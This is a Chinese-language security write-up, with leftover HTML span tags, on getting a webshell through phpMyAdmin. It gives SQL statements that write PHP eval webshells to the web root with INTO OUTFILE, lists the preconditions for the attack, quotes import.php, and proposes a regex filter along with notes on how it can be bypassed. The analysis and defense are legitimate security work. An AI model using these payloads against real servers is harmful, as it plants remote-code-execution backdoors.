Getshell Via phpmyadmin SQL Execution In /import.php To Writ

目录 1 . 漏洞描述 2 . 漏洞触发条件 3 . 漏洞影响范围 4 . 漏洞代码分析 5 . 防御方法 6 . 攻防思考 1. 漏洞描述 phpMyAdmin 是一个以PHP为基础，以Web-Base方式架构在网站主机上的MySQL的数据库管理工具，让管理者可用Web接口管理MySQL数据库。借由此Web接

目录

<span>1</span><span>. 漏洞描述
</span><span>2</span><span>. 漏洞触发条件
</span><span>3</span><span>. 漏洞影响范围
</span><span>4</span><span>. 漏洞代码分析
</span><span>5</span><span>. 防御方法
</span><span>6</span>. 攻防思考

 

1. 漏洞描述

phpMyAdmin 是一个以PHP为基础，以Web-Base方式架构在网站主机上的MySQL的数据库管理工具，让管理者可用Web接口管理MySQL数据库。借由此Web接口可以成为一个简易方式输入繁杂SQL语法的较佳途径，尤其要处理大量资料的汇入及汇出更为方便。其中一个更大的优势在于由于phpMyAdmin跟其他PHP程式一样在网页服务器上执行，但是您可以在任何地方使用这些程式产生的HTML页面，也就是于远端管理MySQL数据库，方便的建立、修改、删除数据库及资料表。也可借由phpMyAdmin建立常用的php语法，方便编写网页时所需要的sql语法正确性

2. 漏洞触发条件

<span>1</span><span>. 已知phpmyadmin的root密码，即mysql的root密码(phpmyadmin只是通过web方式连接mysql的工具)
    </span><span>1</span><span>) mysql本身默认的弱口令
    </span><span>2</span><span>) 通过其他漏洞(例如注入)获得了mysql的root密码
</span><span>2</span><span>. 已知网站的物理路径
    </span><span>1</span>) 在phpmyadmin的后台的<span>"</span><span>变量</span><span>"</span><span>tab页面，可以看到mysql的物理路径，从而推测出网站的物理路径
    </span><span>2</span>) 通过其他web漏洞获得网站的物理路径

通过phpmyadmin进行getshell的核心就是通过sql进行文件写的操作，常见的sql如下

----<span>1</span>---<span>
Create TABLE a (cmd text NOT NULL);
Insert INTO a (cmd) VALUES(</span><span>'</span><span><?php @eval($_POST[cmd])?></span><span>'</span><span>);
</span><span>select</span> cmd <span>from</span> a into outfile <span>'</span><span> C:/htdocs/1.php</span><span>'</span><span>;   
Drop TABLE IF EXISTS a;
DROP TABLE IF EXISTS `a`;
</span>----<span>1</span>---

----<span>2</span>---
<span>select</span> <span>'</span><span><?php @eval($_POST[pass]);?></span><span>'</span>INTO OUTFILE <span>'</span><span>d:/wamp/www/exehack.php</span><span>'</span>
----<span>2</span>---

Relevant Link:

http:<span>//</span><span>www.exehack.net/681.html</span>
http:<span>//</span><span>www.exehack.net/99.html</span>
http:<span>//</span><span>www.187299.com/archives/1695</span>

3. 漏洞影响范围

全部phpmyadmin版本

4. 漏洞代码分析

/phpMyAdmin/import.php

所有处理用户自定义SQL解析执行的逻辑都在这个PHP文件中实现

<span>/*</span><span>
this code point is important
$import_text is the one that need to be check strictly
</span><span>*/</span>
<span>if</span><span> ($go_sql) 
{
    </span><span>//</span><span> parse sql query</span>
    include_once <span>'</span><span>libraries/parse_analyze.inc.php</span><span>'</span><span>;

    </span><span>if</span> (isset($ajax_reload) && $ajax_reload[<span>'</span><span>reload</span><span>'</span>] === <span>true</span><span>) 
    {
        $response </span>=<span> PMA_Response::getInstance();
        $response</span>->addJSON(<span>'</span><span>ajax_reload</span><span>'</span><span>, $ajax_reload);
    }
    PMA_executeQueryAndSendQueryResponse(
        $analyzed_sql_results, </span><span>false</span>, $db, $table, <span>null</span>, $import_text, <span>null</span><span>,
        $analyzed_sql_results[</span><span>'</span><span>is_affected</span><span>'</span>], <span>null</span><span>,
        </span><span>null</span>, <span>null</span>, <span>null</span>, $<span>goto</span>, $pmaThemeImage, <span>null</span>, <span>null</span>, <span>null</span><span>, $sql_query,
        </span><span>null</span>, <span>null</span><span>
    );
} 
</span><span>else</span> <span>if</span><span> ($result) 
{
    </span><span>//</span><span> Save a Bookmark with more than one queries (if Bookmark label given).</span>
    <span>if</span> (! empty($_POST[<span>'</span><span>bkm_label</span><span>'</span>]) && !<span> empty($import_text)) 
    {
        PMA_storeTheQueryAsBookmark(
            $db, $GLOBALS[</span><span>'</span><span>cfg</span><span>'</span>][<span>'</span><span>Bookmark</span><span>'</span>][<span>'</span><span>user</span><span>'</span><span>],
            $import_text, $_POST[</span><span>'</span><span>bkm_label</span><span>'</span><span>],
            isset($_POST[</span><span>'</span><span>bkm_replace</span><span>'</span>]) ? $_POST[<span>'</span><span>bkm_replace</span><span>'</span>] : <span>null</span><span>
        );
    }

    $response </span>=<span> PMA_Response::getInstance();
    $response</span>->isSuccess(<span>true</span><span>);
    $response</span>->addJSON(<span>'</span><span>message</span><span>'</span><span>, PMA_Message::success($msg));
    $response</span>-><span>addJSON(
        </span><span>'</span><span>sql_query</span><span>'</span><span>,
        PMA_Util::getMessage($msg, $sql_query, </span><span>'</span><span>success</span><span>'</span><span>)
    );
} 
</span><span>else</span> <span>if</span> ($result == <span>false</span><span>) 
{
    $response </span>=<span> PMA_Response::getInstance();
    $response</span>->isSuccess(<span>false</span><span>);
    $response</span>->addJSON(<span>'</span><span>message</span><span>'</span><span>, PMA_Message::error($msg));
} 
</span><span>else</span><span> 
{
    $active_page </span>= $<span>goto</span><span>;
    include </span><span>''</span> . $<span>goto</span><span>;
}</span>

5. 防御方法

对变量$import_text进行恶意检查是我们针对phpmyadmin执行sql导出文件getshell攻击的防御思路

<span>if</span>(preg_match(<span>"</span><span>/select.*into.*(outfile|dumpfile)/sim</span><span>"</span><span>, $import_text, $matches))
{
    echo </span><span>"</span><span>request error!</span><span>"</span> . <span>"</span><span></span><span>"</span> . $matches[<span>0</span><span>];
    die();
} </span>

要特别注意的是，在使用PHP的正则匹配引擎的时候，需要考虑到换行场景下的bypass风险
还需要注意的，MYSQL存在很多扩展语法，例如

<span>1</span><span>. 定义存储过程
</span><span>2</span><span>. 定义函数
</span><span>3</span><span>. 定义触发器
</span><span>4</span><span>. 使用语法预处理编译
</span><span>/*</span><span>
prepare stmt from 'select count(*) from information_schema.schemata';
这里待编译的sql语句也可以进行字符变形以此进行bypass
execute stmt;
</span><span>*/</span>

Relevant Link:

http:<span>//</span><span>php.net/manual/en/function.preg-match.php#111573</span>
http:<span>//</span><span>blog.sina.com.cn/s/blog_3fe961ae01013r8f.html</span>

 

6. 攻防思考

Copyright (c) 2014 LittleHann All rights reserved